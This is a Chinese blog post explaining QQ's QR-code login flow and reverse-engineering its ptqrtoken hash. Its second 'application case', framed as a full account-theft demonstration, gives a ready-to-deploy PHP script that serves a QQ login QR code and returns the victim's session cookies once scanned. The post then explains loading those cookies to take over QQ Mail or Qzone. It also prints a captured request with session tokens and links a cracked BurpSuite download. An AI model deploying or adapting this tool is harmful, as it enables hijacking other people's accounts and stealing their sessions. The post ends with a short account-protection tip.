为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示

相关阅读

QQ盗号的最新骗局,请谨防上当受骗-自由者联盟

杂谈

最近QQ的盗号事件属实是太离谱了,很多热心网友表示自己号被盗之后直接在学校或者朋友群里“社死”

大概图片类似下面这样的,一张美女图片配上拙略的白色文字,上面有一些奇妙的网址……

图片[1]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

然后,还有热心网友分享了某群的热心群主奇葩的操作,上一秒还在叮嘱热心网友,下一秒自己就暴毙了……

图片[2]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

最后还有各种热心网友在群里借此调侃,什么肯德基疯狂星期四啦,蔡徐坤啦,B站付费番剧的梗全来了

真是一种奇妙的文化……

最后,QQ在微博上也进行了相关的回复,👉点击阅读

图片[6]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

正文内容

下面开始正文内容,今天来借此聊一聊QQ二维码认证的缺陷

我们打开以QQ邮箱为例,👉QQ邮箱入口

接下来你可以使用BurpSuite配合浏览器抓包

BurpSuite抓包

相关工具

最新BurpSuite2022.6.1专业破解版下载-自由者联盟

抓包过程

我们可以打开浏览器,进入QQ邮箱的链接

图片[7]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

然后选择Intercept is on

这里我们就可以看到qrsig参数了

图片[8]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

不断点Forward,你会发现它会一直发送请求来获取验证码状态,我们可以将其send to repeater

图片[9]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog
ptuiCB('66','0','','0','二维码未失效。(133187324)', '')

算法分析

然后我们发现一个很有趣的事情,这里如果用QQ号进行了扫码,关掉浏览器再重新打开的时候,QQ的参数好像会存在Cookieuin

GET /ptqrlogin?u1=https%3A%2F%2Fwx.mail.qq.com%2Flist%2Freadtemplate%3Fname%3Dlogin_jump.html%26target%3D%26ss%3D1&ptqrtoken=1981830483&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=1-0-1656317019299&js_ver=22062417&js_type=1&login_sig=HGiqYka6T1fp8Qw2D3ste5rpdHEfnTlcsJO4zAYOFl2fCfdPov5qso0RbZs41r7M&pt_uistyle=25&aid=522005705&daid=4&&o1vId=430adb6d3ee59e5c38945f59374f47f3 HTTP/1.1
Host: ssl.ptlogin2.qq.com
Cookie: pgv_pvid=859533072; _tc_unionid=1376e82c-9476-45ac-9c16-e888ef2b4a0f; pac_uid=0_6cdad9795aea8; pt_login_sig=HGiqYka6T1fp8Qw2D3ste5rpdHEfnTlcsJO4zAYOFl2fCfdPov5qso0RbZs41r7M; pt_clientip=f5f1de800ecde135; pt_serverip=a2fc0991b2d27271; pt_local_token=-551264286; uikey=ae26c85367114ca3a8b5cdf27420d1ca4077af5f4fb5faac47495a2b187127c9; pt_guid_sig=b3d88e3354a20313d19b92a8bce48703a636138d26ec5862a0c9d43c14a23f39; qrsig=c792a51a4a31e4b12b419f02b7abb4c343eaaae7165f6dc7ef1e79d67451c0698d197b77bdf7f3a589dd1ec270d4e9df21392cb69d9d463c; pt2gguin=o1123785821; ETK=; uin=o1123785821; skey=@akXFDNZS7; superuin=o1123785821; supertoken=1150127270; superkey=z4cYlv1lLj8wTO-4oMNZ-i0bIObZJrVDebqQQygCFSI_; pt_recent_uins=95bbbe782143b89d5e653e525133a8d41d6bf27447c1cad16b97867ca1982a28bb375dd4aea51679a6f2f8f4ddeccf598f71f3c6460eab4b; RK=fyf0V0+FRx; ptnick_1123785821=266e6273703b266e6273703b266e6273703b2061262333393be3829e20e9a39ee7bf9435e58fb7; ptcz=674d96d15bfe5947f2785ffa5c7e8ccea56eeb3b072a38a0b96241a4e95edd2d; dlock=4_1656316970_2_
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://xui.ptlogin2.qq.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

上面请求包里最重要的两个参数就是

  • qrsig
  • ptqrtoken

ptqrtoken是qrsig对应的token

我们可以在访问QQ邮箱页面时,按F12,然后选择控制台

图片[10]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

点开c_login_2.js可以查看详细的代码,我们可以搜索ptqrlogin查看它是如何生成的

图片[11]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

可以看到ptqrtoken是通过hash33算法生成的

i.ptqrtoken=k["default"].str.hash33(k["default"].cookie.get("qrsig"))

为了方便搜索阅读,我们可以将上面的代码在新的标签页打开

图片[12]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

如果你找不到,我们将链接提供在了下方,您可以搜索进行验证

https://qq-web-legacy.cdn-go.cn/any.ptlogin2.qq.com/v1.32.3/ptlogin/js/c_login_2.js

搜索hash33关键词

图片[13]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

可以发现其算法如下

function(t) {
    for (var e = 0,
    n = 0,
    o = t.length; n < o; ++n) e += (e << 5) + t.charCodeAt(n);
    return 2147483647 & e
}

如何验证这个算法是正确的呢?

我们将其封装并填入在控制台的输入里

function  a(t){

for(var  e=0,i=0,n=t.length;

i<n;++i)e+=(e<<5)+t.charCodeAt(i);

return  2147483647&e}

同时寻找一个现成的请求

图片[14]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

可以看到这里qrsig的值为

40dd96a76e5fdc9f91ddca932d64d2f40c52ccc2f4969eb0d8ae8b1bb5110a8d260a4bfc304af6f13c8445d9214a4d3299755ad915014d5d

我们同时记录url

图片[15]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog
https://ssl.ptlogin2.qq.com/ptqrlogin?u1=https://wx.mail.qq.com/list/readtemplate?name=login_jump.html&target=&ss=1&ptqrtoken=1300443533&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-1656319724261&js_ver=22062417&js_type=1&login_sig=otCqWAINA29ic3xHgc6lxAfOy*q7WiTyEQe2folwtcE66-HRtLL5pBStAtE*Tp5E&pt_uistyle=25&aid=522005705&daid=4&&o1vId=c06f0c7ffec8e1b1ab4cc26737147717

然后我们在控制台里填入函数,并输出经过计算后的ptqrtoken

图片[16]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

这里计算结果为

1300443533

对比发现没错,算法是精准的

图片[17]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

流程总结

因此完整的流程可以归纳为

  • 获取二维码和qrsig值
  • 根据qrsig值计算ptqrtoken
  • 一直发送qrsig、ptqrtoken来确认验证码状态(未失效?认证中?已失效?)
  • 如果有人扫码并确认,则返回成功的结果。如果扫码未确认或者超时,则重复上述步骤

应用案例一:QQ空间批量下载相册

有了上面的流程,可以说是个双刃剑

对于一些热心网友的开发,比方说扫码登录就是一个很不错的应用

我们之前给大家分享过用Go语言开发的QQ空间相册批量下载的程序

【在线学习】Go语言零基础到实战55节课-自由者联盟

其中扫描二维码登录空间的核心代码如下

// 检查用户是否扫描成功以及是否登录成功
func (q *Qzone) ifLogin(ptqrtoken string, loginSig string, qrsig string) (string, error) {
	header := make(map[string]string)
	header["user-agent"] = USER_AGENT
	header["cookie"] = fmt.Sprintf("qrsig=%s;", qrsig)
	url := fmt.Sprintf("https://ssl.ptlogin2.qq.com/ptqrlogin?u1=%s&ptqrtoken=%v&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=%v&js_ver=21010623&js_type=1&login_sig=%v&pt_uistyle=40&aid=549000912&daid=5&has_onekey=1", iurl.QueryEscape("https://qzs.qq.com/qzone/v5/loginsucc.html?para=izone"), ptqrtoken, q.action(), loginSig)

	_, b, err := ihttp.Get(url, header)
	if err != nil {
		return "", errors.New(err.Error())
	}

	return string(b), nil
}

// 随机数
func (q *Qzone) t() string {
	return strconv.FormatFloat(rand.Float64(), 'g', -1, 64)
}

// 获取二维码
func (q *Qzone) getQRC() (http.Header, error) {
	url := "https://ssl.ptlogin2.qq.com/ptqrshow?appid=549000912&e=2&l=M&s=3&d=72&v=4&t=" + q.t() + "&daid=5&pt_3rd_aid=0"
	resp, err := http.Get(url)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()

	file, err := os.OpenFile(QRCODE_SAVE_PATH, os.O_RDWR|os.O_CREATE, 0666)
	if err != nil {
		return nil, err
	}
	defer file.Close()

	_, err = io.Copy(file, resp.Body)
	if err != nil {
		return nil, err
	}

	return resp.Header, nil
}

// 获取login_sig参数
func (q *Qzone) getLoginSig() (string, error) {
	url := "https://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https://qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&appid=549000912&style=22&target=self&s_url=https://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&pt_qr_app=手机QQ空间&pt_qr_link=https://z.qzone.com/download.html&self_regurl=https://qzs.qq.com/qzone/v6/reg/index.html&pt_qr_help_link=https://z.qzone.com/download.html&pt_no_auth=0"
	resp, err := http.Get(url)
	if err != nil {
		return "", errors.New(err.Error())
	}
	resp.Body.Close()

	setCookies := resp.Header.Values("Set-Cookie")
	if len(setCookies) < 1 {
		return "", errors.New("获取login_sig参数错误,请稍后重试")
	}

	var loginSig string
	for _, val := range setCookies {
		if strings.Contains(val, "pt_login_sig=") {
			s := strings.Split(val, ";")
			for _, v := range s {
				if strings.Contains(v, "pt_login_sig=") {
					loginSig = strings.Replace(v, "pt_login_sig=", "", 1)
				}
			}
		}
	}

	if loginSig == "" {
		return "", errors.New("获取login_sig参数错误,请稍后重试")
	}

	return loginSig, nil
}

/**
 * 获获取ptqrttoken参数
 * header http.Header 将获取二维码接口的headers传进来
 */
func (q *Qzone) ptqrtoken(qrsig string) string {
	e := 0
	for i := 0; i < len(qrsig); i++ {
		e += (e << 5) + int(qrsig[i])
	}

	return strconv.Itoa(2147483647 & e)
}

// 获取action参数
func (q *Qzone) action() string {
	return fmt.Sprintf("0-0-%d", time.Now().Unix()*1000)
}

// 登录成功,验证进入空间的签名
func (q *Qzone) credential(url string) (map[string]string, error) {
	req, err := http.NewRequest("GET", url, nil)
	if err != nil {
		return nil, err
	}

	client := &http.Client{}
	client.CheckRedirect = func(req *http.Request, via []*http.Request) error {
		return http.ErrUseLastResponse
	}

	resp, err := client.Do(req)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()

	var (
		p_skey string
		needs  = []string{"uin", "skey", "p_uin", "pt4_token", "p_skey"} // 需要从set-cookie取的参数
		cookie = make([]string, 0)
	)

	setCookies := resp.Header.Values("Set-Cookie")
	for _, val := range setCookies {
		c := strings.Split(strings.Split(val, ";")[0], "=")
		name := c[0]
		value := c[1]
		for _, ckey := range needs {
			if name == ckey && value != "" {
				if ckey == "p_skey" {
					p_skey = value
				}
				cookie = append(cookie, fmt.Sprintf("%s=%s", name, value))
			}
		}
	}

	res := make(map[string]string)
	res["g_tk"] = q.gtk(p_skey)
	res["cookie"] = strings.Join(cookie, "; ")

	return res, nil
}

// 获取登录成功之后的g_tk参数
func (q *Qzone) gtk(skey string) string {
	h := 5381
	for i := 0; i < len(skey); i++ {
		h += (h << 5) + int(skey[i])
	}

	return strconv.Itoa(h & 2147483647)
}

应用案例二:QQ盗号全过程

当然,如果碰到一些内心比较阴暗的网友,也会通过二维码的机制,在别人不小心扫码登陆后,在空间发布恶意内容!我们今天给大家讲解一下完整过程,其实我们之前分享过详细的代码。

我们今天进行一个具体的演示,代码会在最后进行分享

投递二维码获取Cookie

我们可以访问下面的链接

https://www.cvv-goods.com/demo/qq_login/?type=get

然后你会发现下面的代码为

  • qrsig就是我们上面讲的
  • qr_code是二维码图片
{"state":200,"info":{"qrsig":"2f414f8f0dd3a75d3e466690f4373868466290a5a3112dbf9c215bc8c00d3744c6e33a77e948bfa28fef957a088e639f83311e57ef70c375","qr_code":""}}

我们复制qr_code后面的



我们可以复制到浏览器打开

图片[18]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

然后让热心网友扫码

然后我们通过下面的链接进行查询结果

https://iculture.cc/demo/qq_login/?type=result&qrsig=2f414f8f0dd3a75d3e466690f4373868466290a5a3112dbf9c215bc8c00d3744c6e33a77e948bfa28fef957a088e639f83311e57ef70c375

未失效代表的是二维码还没有扫

图片[19]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

如果扫过了之后这里会出现对方的Cookie,拿到了Cookie基本上就可以登录QQ邮箱了!

图片[20]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

你可以通过cookie-editor或者其他插件修改cookie登录QQ邮箱或者QQ空间

图片[21]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

这里我们就不再深入探讨了,您如果有想法可以在评论区留言!

其实代码之前就分享过,这里再分享一次,您可以上传到网站目录下,使用index.php命令

<?php
	error_reporting(0);
	header('content-type:application/json');
    
	function request_http($url, $type=0, $post_data='', $ua='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.58', $cookie='', $header=array(), $redirect=true){
		// 初始化curl
		$curl = curl_init();
		// 设置网址
		curl_setopt($curl,CURLOPT_URL, $url);
		// 设置UA
		if (empty($ua) == false) {
			$header[] = 'User-Agent:'.$ua;
		}
		// 设置Cookie
		if (empty($cookie) == false) {
			$header[] = 'Cookie:'.$cookie;
		}
		// 设置请求头
		if (empty($ua) == false or empty($cookie) == false or empty($header) == false) {
			curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
		}
		// 设置POST数据
		if($type == 1){
		    curl_setopt($curl, CURLOPT_POST, true);
		    curl_setopt($curl, CURLOPT_POSTFIELDS, $post_data);
		}
		// 设置重定向
		if ($redirect == false) {
			curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); 
		}
		// 过SSL验证证书
		curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
		curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
		// 将头部作为数据流输出
		curl_setopt($curl, CURLOPT_HEADER, true);
		// 设置以变量形式存储返回数据
		curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
		// 请求并存储数据
		$return = curl_exec($curl);
		// 分割头部和身体
		if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '200') {
			$return_header_size = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
		    $return_header = substr($return, 0, $return_header_size);
		    $return_data = substr($return, $return_header_size);
		}
		// 关闭cURL
		curl_close($curl);
		// 返回数据
		return [$return_header, $return_data];
	}
	
	function return_result($state, $info) {
		$result = array(
			'state'=>$state,
			'info'=>$info
		);
		exit(stripslashes(json_encode($result, JSON_UNESCAPED_UNICODE)));
	}
	
	function get_middle_text($text, $text_left, $text_right) {
		$left = strpos($text, $text_left);
		$right = strpos($text, $text_right, $left);
		if ($left < 0 or $right < $left) {
			return False;
		};
		return substr($text, $left + strlen($text_left), $right - $left - strlen($text_left));
	}
	
	function get_ptqrtoken($qrsig) {
		$len = strlen($qrsig);
		$hash = 0;
		for ($i = 0; $i < $len; $i++) {
		    $hash += (($hash << 5) & 2147483647) + ord($qrsig[$i]) & 2147483647;
		    $hash &= 2147483647;
		}
		return $hash & 2147483647;
	}
	
	function get_result_data($qrsig){
		$state_data = request_http('https://ssl.ptlogin2.qq.com/ptqrlogin?u1=https://qzs.qzone.qq.com/qzone/v5/loginsucc.html?para=izone&from=iqq&ptqrtoken='.get_ptqrtoken($qrsig).'&ptredirect=1&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=0-0-'.time().'&js_ver=10233&js_type=1&login_sig='.$qrsig.'&pt_uistyle=40&aid=549000912&daid=5', null, null, null, 'qrsig='.$qrsig)[1];
		if (strpos($state_data, '未失效') == true) {
			return '未失效';
		}
		elseif (strpos($state_data, '认证中') == true) {
			return '认证中';
		}
		elseif (strpos($state_data, '登录成功') == true) {
			$ptuicb_url = get_middle_text($state_data, "'0','0','", "','1',");
			$ptuicb_header = request_http($ptuicb_url, null, null, null, null, null, false)[0]; 
			$cookie = 'uin='.get_middle_text($ptuicb_header, 'uin=', ';').';skey='.get_middle_text($ptuicb_header, 'skey=', ';').';p_uin='.get_middle_text($ptuicb_header, 'p_uin=', ';').';p_skey='.get_middle_text($ptuicb_header, 'p_skey=', ';').';pt4_token='.get_middle_text($ptuicb_header, 'pt4_token=', ';');
			return ['已登录', $cookie];
		}
		elseif (strpos($state_data, '已失效') == true) {
			return '已失效';
		}
	}
	
	function get_login_data(){
		$return = request_http('https://ssl.ptlogin2.qq.com/ptqrshow?appid=549000912&e=2&l=M&s=3&d=72&v=4&t='.time().'&daid=5&pt_3rd_aid=0');
		$qrsig = get_middle_text($return[0], 'qrsig=', ';');
		$qr_code = 'data:image/jpeg;base64,'.base64_encode($return[1]);
		return [$qrsig, $qr_code];
	}
	
	$TYPE = $_REQUEST['type'];
	$QRSIG = $_REQUEST['qrsig'];
	if (empty($TYPE) == true or ($TYPE != 'get' and empty($QRSIG) == true)) {
		return_result(100, '参数错误');
	}
	elseif ($TYPE == 'get') {
		$login_data = get_login_data();
		$result = array(
			'qrsig'=>$login_data[0],
			'qr_code'=>$login_data[1]
		);
		return_result(200, $result);
	}
	elseif ($TYPE == 'result') {
		$result_data = get_result_data($QRSIG);
		if (is_string($result_data) == True) {
			$result = $result_data;
		}
		else{
			$result = array(
				'state'=>$result_data[0],
				'cookie'=>$result_data[1]
			);
		}
		return_result(200, $result);
	}
	else{
		return_result(100, '类型错误');
	}
?>

防范措施

建议您对于QQ邮箱启用独立验证码

图片[22]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

设置方法:在设置>账户>账户安全中

设置好独立密码

图片[23]-为什么最近盗号频发?QQ二维码认证机制 最后附QQ盗号的过程演示-FancyPig's blog

更多阅读

© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片

    暂无评论内容